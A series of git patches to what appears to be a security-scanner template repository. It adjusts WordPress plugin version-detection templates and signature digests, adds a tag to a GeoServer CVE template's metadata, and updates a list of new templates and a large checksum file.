a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae898303673464ba3816949325821948ee752f688bc15e47125e3fd69d644e900221008c68527f1380a636e9e53af1c512e22d70dac37cd0dbb4b181419acdc72ac4c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ad7b5c96ec5..6dcfdda1174 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dbb2faa62f33338d616af5c603039cb86bf08aea526d628db1903726d4b452d502203322910323a5b860c8bdb03539037f08f03d1f628e2437b195b6a207bed704a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 367590f167858ab9145d0c505d5d4901531e9c8d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 16 Jul 2024 10:24:48 +0700 Subject: [PATCH 209/247] Added kev tag --- http/cves/2024/CVE-2024-36401.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 51a858d7ad8..334b162ac89 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -23,7 +23,7 @@ info: - title="geoserver" - app="geoserver" google-query: intitle:"geoserver" - tags: cve,cve2024,geoserver,rce,unauth + tags: cve,cve2024,geoserver,rce,unauth,kev flow: | if(http(1)) @@ -65,4 +65,4 @@ http: part: content_type words: - "application/xml" -# digest: 4a0a004730450220279aaebd1a369cf4592114ead904a1520e41ad97306683da9c89b53d278a40a3022100d045a6c3237dcc38c0af5dce4e225c736ea8361f759fb8fc444da9a24ab3c6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220279aaebd1a369cf4592114ead904a1520e41ad97306683da9c89b53d278a40a3022100d045a6c3237dcc38c0af5dce4e225c736ea8361f759fb8fc444da9a24ab3c6ed:922c64590222798bb761d5b6d8e72950 From 1667bf9d63a26ee0ea5cc280a5994476c75a3854 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 08:59:06 +0530 Subject: [PATCH 210/247] Create wp-crontrol.txt --- helpers/wordpress/plugins/wp-crontrol.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/wp-crontrol.txt diff --git a/helpers/wordpress/plugins/wp-crontrol.txt b/helpers/wordpress/plugins/wp-crontrol.txt new file mode 100644 index 00000000000..092afa15df4 --- /dev/null +++ b/helpers/wordpress/plugins/wp-crontrol.txt @@ -0,0 +1 @@ +1.17.0 From 37de2687551f9480d0285e382c4aa5bdd246597d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 03:33:36 +0000 Subject: [PATCH 211/247] Auto Generated New Template Addition List [Tue Jul 16 03:33:36 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1de228ee1ac..804bb748095 100644 --- a/.new-additions +++ b/.new-additions @@ -15,5 +15,6 @@ http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/misconfiguration/servicenow-title-injection.yaml http/technologies/apache/apache-ozone-detect.yaml +http/technologies/wordpress/plugins/wp-crontrol.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 4d75d9f73bac627d7510d89a800205e857fddb21 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 03:33:42 +0000 Subject: [PATCH 212/247] Auto Generated Templates Checksum [Tue Jul 16 03:33:42 UTC 2024] :robot: --- templates-checksum.txt | 416 +++++++++++++++++++++-------------------- 1 file changed, 209 insertions(+), 207 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9619570a417..5d6543c9906 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -742,7 +742,7 @@ helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a helpers/wordpress/plugins/all-in-one-seo-pack.txt:a0d8efde6c39ba693651a975ac3b93c16ed3d566 helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0e7857ba95ff2de helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 -helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f +helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 helpers/wordpress/plugins/astra-sites.txt:3d21640165adc9cb26c17e43dc6358a33c744d03 helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda @@ -786,7 +786,7 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f -helpers/wordpress/plugins/elementor.txt:9e43adc2b2562071078f6f82962886b245d01a6a +helpers/wordpress/plugins/elementor.txt:d9abe4c43d66f95b79773f980a97bfd3f2148920 helpers/wordpress/plugins/elementskit-lite.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 @@ -806,7 +806,7 @@ helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c helpers/wordpress/plugins/google-analytics-for-wordpress.txt:51e5b4744f672fbc75ac2043bb18ffd8d1d563c3 helpers/wordpress/plugins/google-listings-and-ads.txt:cef8b08512cec8f1ab07ed0f568d56f767ca88fa -helpers/wordpress/plugins/google-site-kit.txt:451786e82a4757f98ef5d85c39adb09689db4c3f +helpers/wordpress/plugins/google-site-kit.txt:3fc4f3215f2c02622f980d28a4791bcc6857a95e helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/gutenberg.txt:2aec4d7bf0ab32bb446c2b0aed18357efa20cd9f @@ -862,7 +862,7 @@ helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:024e6d4f5d6db7d7e0b074cb50b41ad492ddb8c3 -helpers/wordpress/plugins/pixelyoursite.txt:974a8526fa7eca888635cdcce48149cb3d049570 +helpers/wordpress/plugins/pixelyoursite.txt:eed99d45d85b51d535a8ee871f49622ae2ab39c6 helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d @@ -914,7 +914,7 @@ helpers/wordpress/plugins/webp-converter-for-media.txt:404069cef132c1712e21fc32e helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:5e0ad8390d778d86a4a369e5ad6950036a8ebb86 -helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 +helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d20e6b799a7bc47bbdd80029ea94c45fd2d40b68 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:373c54d47cc406011bd3964962f1e869d501afa4 @@ -929,6 +929,7 @@ helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 helpers/wordpress/plugins/wordpress-seo.txt:e897fca0b3c8ab2a2a6dfca6e49d92a8ba550aaa helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf +helpers/wordpress/plugins/wp-crontrol.txt:eb8b2b4c9662703da43bc73b59b0508ccdd9de8e helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 @@ -3477,7 +3478,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:9ce37b567a44a508495f69a3ecda745d30a6dcd1 +http/cves/2024/CVE-2024-36401.yaml:1092d9728d862b1d18a9ff74a145e414eb5e916e http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -7289,228 +7290,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:ec6d6a80835bbb3f4141c9af043faa54caa09d90 -http/technologies/wordpress/plugins/add-to-any.yaml:45e1ec080492018feecfa2c9995d9f4f46a7e196 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:2a710053db37c53c93a1b7c2712ec6fbf9e5dc9d +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:49a18104c3daf80a90c52b4919c7e512e81d0d9c -http/technologies/wordpress/plugins/akismet.yaml:1a755eae638b38bf09e11a20d46e44db70bd0456 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:cf549a4946cd28525b458e7d22fd60380e0c63cb -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:2a418957205cd8e1ac557a830e88689ae5ded1e6 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:d0a62ac8b1184cd285a851d188813aa801eed1f4 -http/technologies/wordpress/plugins/amp.yaml:70d51ff352fbe5bd009823857d20c84cd1077539 -http/technologies/wordpress/plugins/antispam-bee.yaml:e3dd8e3cabe81656fa177144104dbda698fa1bdf -http/technologies/wordpress/plugins/astra-sites.yaml:7e6ad639b876a664219d0b6c21179d9819cd9cd7 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:18ec876d0e4b0404ca5650d6ba87cf9bf30faf3f -http/technologies/wordpress/plugins/backwpup.yaml:3e7c70d589c265eafcd9a598b4c1ae79d1dedf3e -http/technologies/wordpress/plugins/better-search-replace.yaml:693592eaf5badf4f412417951e15b456fc488294 -http/technologies/wordpress/plugins/better-wp-security.yaml:158e86629c4d67a29d60f802f1e293ddcdd2e576 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:1e04cf0e900ffad1f109cc7a0c2739099aa85470 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:39c92ef0fa3d4208b26e7389f47d97b9dc25fa05 -http/technologies/wordpress/plugins/breeze.yaml:011bab668295bdc97fcaefc417c8fba3221a7f07 -http/technologies/wordpress/plugins/broken-link-checker.yaml:5003e452889b0f738b14ee1420944b2288b6e996 -http/technologies/wordpress/plugins/chaty.yaml:39c3dd5785e9e8091443c628d340f95870fcbf22 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:ca5f7fddd0ff0cf926791c592bdea137fe52813f -http/technologies/wordpress/plugins/classic-editor.yaml:a2bb1a7615d1e16f680b124ee1698e320d348101 -http/technologies/wordpress/plugins/classic-widgets.yaml:09369b35177b15e9effbe11495feba8fd0194c0e -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e5b4a79a7a12a16ff3522723149892f8143a9ccf +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:8f356781b0c6f60c84800edfef3d297e6fedac13 -http/technologies/wordpress/plugins/coblocks.yaml:21466ff13da33db1ed0a12245f8c1cdfe5571c93 -http/technologies/wordpress/plugins/code-snippets.yaml:f00c9620bb5f5c1628a1e990431f3610e04bbc08 -http/technologies/wordpress/plugins/coming-soon.yaml:eb264fdfa1582b57d383fb29f0ac4e32185a4156 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:0b4d7cd050e6eef73b7b0746d03b3f26dc1793de -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:bb136d72c0a23f9da731f40c98d53498428d4d42 -http/technologies/wordpress/plugins/contact-form-7.yaml:16cfe7fb7fa0edb3ee7ba353a2f2f16a3936ad08 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:c1afab529d3e962c0326bf3f6c04584c7698c576 -http/technologies/wordpress/plugins/cookie-law-info.yaml:e4f18a649dcc131f5fc9dc8b99691e8097b341e0 -http/technologies/wordpress/plugins/cookie-notice.yaml:42a4e3f4aeea8e29c796360d65436661ff6eee02 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:485d6b2d46344ae950b628203713f9b99c0d1b70 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:b3fc48e6d7f84c27712fdf7b7184036421d1a1f3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:1de9232d645f8f8ab903ce3b98e23be8d2bd8f46 -http/technologies/wordpress/plugins/custom-css-js.yaml:6a8517d76a9285f725f484611156cf7b4a94c5dd -http/technologies/wordpress/plugins/custom-fonts.yaml:5233af35c176fb81de0987b7d990fe847280375c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:962a516457ef2d168867b8a8e389f46aa5722355 -http/technologies/wordpress/plugins/disable-comments.yaml:d703ead0cccc639c55d875c43bf4b284b016b5d9 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:d795991385be7b003655fe296fb894a7a9eaceac -http/technologies/wordpress/plugins/duplicate-page.yaml:270a67913b87b96095ab292df47dd79593259b39 -http/technologies/wordpress/plugins/duplicate-post.yaml:8541b4f219bff5af4a38bd8036a1848a7c305b2f -http/technologies/wordpress/plugins/duplicator.yaml:ca505fad84fd7e76ff38c107ee87c5a5211cf617 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:7dd68e2bc5d3e7f9e811180eabc75de75d93e64a +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:39f2cda7226c70e0826d562bb89ad8c0f760e67d -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:a1b27312856f2086c164bc3675f01182f0cedf57 -http/technologies/wordpress/plugins/elementor.yaml:30cea111c3825610880ad65dbe200e49fd600069 -http/technologies/wordpress/plugins/elementskit-lite.yaml:881d5a2dc1b98160cff8d3e294f26ae14eeaae7c -http/technologies/wordpress/plugins/enable-media-replace.yaml:05a30d6aab1d34d80f461603f1f2afdf892b1b7b -http/technologies/wordpress/plugins/envato-elements.yaml:7832ff853d622bfc6b7cadab29a827ef3cbd4297 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:bbadddcc15a21cb6df46656eb827e03e5e307c12 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:4a95e18a2b08b41359a90e35be582d97997bdece -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:c8314bf4b050f3d4efea10042fd3ab58327e3880 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:925c51f8799ee427f58415321c9af2d3f25f8970 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:c30c43c11707053ec5b2ce4b4fcd7185873de9ef -http/technologies/wordpress/plugins/flamingo.yaml:2d551553838a8d84666aaa0a202f9b2faad2743d -http/technologies/wordpress/plugins/fluentform.yaml:6275e0845d8decc23fcf50d42b8ca2f14ba00fea -http/technologies/wordpress/plugins/font-awesome.yaml:f24a1db1dd21796aeb3ba2e50bc1063686dddd6c -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6961fa2e30b8576eaf4f2ee8a255cf513f7ddec4 -http/technologies/wordpress/plugins/formidable.yaml:f1bd461de526addeee85b9f926da7634c250c041 -http/technologies/wordpress/plugins/forminator.yaml:7160b4865b0549f5bbb4f79be209bbb3d9ce2b9a -http/technologies/wordpress/plugins/ga-google-analytics.yaml:55ba408567d497d46156750e38e607091bc15ab3 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:181b06a305c96a16714411569b08d0e2291b4035 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:f99f54e65b0792a3b9d42ae312a695146c25f673 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:37db5bcdd61dbaaf8164482f195d5ed4af5bc629 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:faf94162127afa8d863cd0dcf5605899b97105e8 -http/technologies/wordpress/plugins/google-site-kit.yaml:85906b13a43595f0d9126c63872516dd83062a26 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:182794b9602a4f5b33baf8d37eab1c70eca52b99 -http/technologies/wordpress/plugins/gtranslate.yaml:55d22ad1448bd8cf0532aaa4ed1f36b443f62203 -http/technologies/wordpress/plugins/gutenberg.yaml:4ee6aac103c4b896ae47c3b4882427dfeba45eb3 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:484d4d318315a9b094a2a81f3c44eb33261c41f0 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:fa7b84a46f5fb575dddedb7c486d2adbaafcde17 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:4d21952b916b194e828ed3cd60e13ff3528d6786 -http/technologies/wordpress/plugins/header-footer.yaml:69172dcc2f8d8b94407e93b071d0c7d7b11c9f6f -http/technologies/wordpress/plugins/health-check.yaml:0d3f8ad6f9818c3b9fc5834f5c46d0f42a52b72b -http/technologies/wordpress/plugins/hello-dolly.yaml:fb5b66126726747e9318c33b63b310c19ed55c6f -http/technologies/wordpress/plugins/host-webfonts-local.yaml:3d50940fa537e4857a59ae2861b0f85bb079e579 -http/technologies/wordpress/plugins/hostinger.yaml:c5c02274bb041901eb18f1fbed64e8ce027c84f2 -http/technologies/wordpress/plugins/image-optimization.yaml:a95462f9e94f795179db16fd251ef70dd866d817 -http/technologies/wordpress/plugins/imagify.yaml:f62a5df95cbbb28811ebb8afb3aaecf2a87d851f -http/technologies/wordpress/plugins/imsanity.yaml:1a7c472de1b562a8937f013004547e0dc4bb6c9d -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:3e012b09cd2e38093cbd4142d347861577356571 -http/technologies/wordpress/plugins/instagram-feed.yaml:a18fef5df70be71707ff08a91541c94a8287f31e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:6f146b7d8f15b0f4d5f5236d6bb9af8c05a2e2a7 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 